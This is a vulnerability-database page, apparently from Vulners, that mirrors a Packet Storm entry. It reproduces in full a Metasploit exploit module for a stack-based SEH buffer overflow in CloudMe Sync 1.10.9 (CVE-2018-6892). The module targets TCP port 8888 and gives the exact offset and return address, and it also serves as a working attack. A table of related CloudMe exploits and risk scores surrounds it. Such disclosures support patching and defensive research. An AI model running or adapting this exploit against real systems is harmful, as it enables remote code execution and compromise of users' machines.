Vulners
Lucene search
CloudMe Sync 1.10.9 Buffer Overflow
🗓️ 23 Feb 2018 00:00:00Reported by Daniel TeixeiraType 
packetstorm🔗 packetstormsecurity.com👁 36 Views
| Reporter | Title | Published | Views | Family All 36 |
|---|---|---|---|---|
 | CloudMe Sync 1.10.9 Remote Buffer Overflow Vulnerability | 12 Feb 201800:00 | – | zdt |
| CloudMe Sync 1.10.9 Buffer Overflow Exploit | 23 Feb 201800:00 | – | zdt |
| CloudMe Sync 1.9.2 Remote Buffer Overflow Exploit | 6 Mar 201800:00 | – | zdt |
| Cloudme 1.9 - Buffer Overflow (DEP) Учздщше | 14 Aug 201800:00 | – | zdt |
| CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt Exploit | 22 Jan 201900:00 | – | zdt |
| CloudMe Sync 1.11.2 Buffer Overflow - WoW64 - (DEP Bypass) Exploit | 28 Jan 201900:00 | – | zdt |
| CloudMe 1.11.2 SEH Buffer Overflow Exploit | 3 Aug 202000:00 | – | zdt |
| CloudMe 1.11.2 - Buffer Overflow ROP (DEP,ASLR) Exploit (2) | 29 Sep 202000:00 | – | zdt |
 | CVE-2018-6892 | 13 Feb 201800:00 | – | circl |
 | CloudMe Buffer Overflow Vulnerability | 12 Feb 201800:00 | – | cnvd |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'CloudMe Sync v1.10.9',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability
in CloudMe Sync v1.10.9 client application. This module has been
tested successfully on Windows 7 SP1 x86.
},
'License' => MSF_LICENSE,
'Author' =>
[
'hyp3rlinx', # Original exploit author
'Daniel Teixeira' # MSF module author
],
'References' =>
[
[ 'CVE', '2018-6892'],
[ 'EDB', '44027' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00",
},
'Targets' =>
[
[ 'CloudMe Sync v1.10.9',
{
'Offset' => 2232,
'Ret' => 0x61e7b7f6
}
]
],
'Privileged' => true,
'DisclosureDate' => 'Jan 17 2018',
'DefaultTarget' => 0))
register_options([Opt::RPORT(8888)])
end
def exploit
connect
buffer = make_nops(target['Offset'])
buffer << generate_seh_record(target.ret)
buffer << payload.encoded
sock.put(buffer)
handler
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Feb 2018 00:00Current
8.8High risk
Vulners AI Score8.8
EPSS0.89668